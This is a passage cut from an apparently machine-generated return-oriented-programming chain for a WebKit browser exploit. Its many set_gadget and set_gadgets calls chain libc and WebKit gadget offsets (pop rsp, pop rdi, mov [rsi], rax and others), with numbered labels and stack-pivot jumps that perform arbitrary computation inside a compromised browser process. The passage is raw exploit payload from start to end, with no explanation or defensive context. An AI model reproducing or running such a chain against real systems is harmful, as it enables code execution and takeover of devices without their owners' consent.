//L10934:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10935:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+501952, //L10936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L10936:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10937:
db([32, 0]); // 0x20
set_gadget(libc_base+144605,); //pop rdi
//L10938:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+502080, //L10940
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+502064, //L10939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10939:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10940:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+502160, //L10941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10941:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10943:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+502280, //L10946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+502264, //L10944
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10944:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10946:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+502360, //L10948
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+502392, //L10950
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10948:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L10949:
ropchain+502520, //L10947
libc_base+144605 //pop rdi
]);
//L10950:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+502496, //L10952
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+502512, //L10951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L10952:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L10951:
db([0, 0]); // 0x0
//L10947:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+502584, //L10953
//L10896:
libc_base+782311, //pop rsp
ropchain+502600, //L10954
//L10953:
libc_base+782311, //pop rsp
ropchain+498576, //L10852
//L10954:
//L10846:
libc_base+764760, //pop rsi
ropchain+502640, //L10955
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10955:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10957:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+502760, //L10960
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+502744, //L10958
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10958:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10960:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+502904, //L10963
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+502872, //L10961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+502888, //L10962
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10961:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10962:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10963:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+502992, //L10965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L10964:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L10965:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+503048, //L10966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10966:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10968:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+503128, //L10970
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10970:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+548864, //L10599
//L8516:
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10971:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10973:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+503320, //L10976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+503304, //L10974
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10974:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10976:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+503480, //L10980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+503432, //L10977
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+503448, //L10978
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10977:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10978:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10979:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L10980:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+503536, //L10981
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10981:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10983:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+503656, //L10984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+503672, //L10986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10984:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10986:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+503760, //L10987
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+503776, //L10989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10987:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10989:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10990:
db([4294967208, 4294967295]); // -0x58
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10991:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10993:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+503952, //L10996
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+503936, //L10994
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10994:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10996:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+504128, //L10999
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+504144, //L11000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+504096, //L10997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+504112, //L10998
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10997:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10998:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10999:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11000:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+504304, //L11004
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+504272, //L11002
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+504288, //L11003
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11001:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11002:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11003:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11004:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+504440, //L11007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+504472, //L11009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+504424, //L11006
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11006:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11007:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11008:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11009:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+504584, //L11010+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+504576, //L11010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L11010:
db([0, 0]); // 0x0
set_gadgets([
ropchain+504600, //L11010+24
ropchain+505240, //L11005
libc_base+764760, //pop rsi
ropchain+504640, //L11011
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11011:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11013:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+504760, //L11016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+504744, //L11014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11014:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11016:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+504936, //L11019
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+504952, //L11020
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+504904, //L11017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+504920, //L11018
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11017:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11018:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11019:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11020:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+505112, //L11024
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+505080, //L11022
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+505096, //L11023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11021:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11022:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11023:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11024:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+505216, //L11027
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+505200, //L11026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11026:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11027:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+505592, //L11025
//L11005:
libc_base+759608 //pop rax
]);
//L11028:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11029:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L11030:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+505472, //L11032
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+505488, //L11033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+505456, //L11031
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11031:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11032:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11033:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+505584, //L11035
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+505568, //L11034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11034:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11035:
db([0, 0]); // 0x0
//L11025:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+505664, //L11036
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11036:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11038:
db([4294967208, 4294967295]); // -0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+505784, //L11041
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+505768, //L11039
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11039:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11041:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+505928, //L11044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+505896, //L11042
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+505912, //L11043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11042:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11043:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11044:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L11046:
ropchain+506032, //L11045
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+175384, //__strnlen_s
//L11045:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+506104, //L11047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11047:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11049:
db([4294967204, 4294967295]); // -0x5c
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L11051:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+506264, //L11054
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+506248, //L11052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11052:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11054:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+506440, //L11057
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+506456, //L11058
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+506408, //L11055
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+506424, //L11056
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11055:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11056:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11057:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11058:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+506552, //L11060
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+506536, //L11059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11059:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11060:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11061:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11062:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L11063:
db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+506752, //L11065
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11065:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+506808, //L11066
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11066:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+506944, //L11070
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+506928, //L11069
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11068:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11069:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11070:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+507080, //L11073
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+507112, //L11075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+507064, //L11072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11072:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11073:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11074:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11075:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+507224, //L11076+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+507216, //L11076
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L11076:
db([0, 0]); // 0x0
set_gadgets([
ropchain+507240, //L11076+24
ropchain+510168, //L11071
libc_base+764760, //pop rsi
ropchain+507280, //L11077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11077:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11079:
db([4294967204, 4294967295]); // -0x5c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+507400, //L11082
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+507384, //L11080
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11080:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11082:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+507576, //L11085
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+507592, //L11086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+507544, //L11083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+507560, //L11084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11083:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11084:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11085:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11086:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+507752, //L11090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+507720, //L11088
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+507736, //L11089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11087:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11088:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11089:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11090:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+507856, //L11092
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+507840, //L11091
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11091:
db([0, 0]); // 0x0
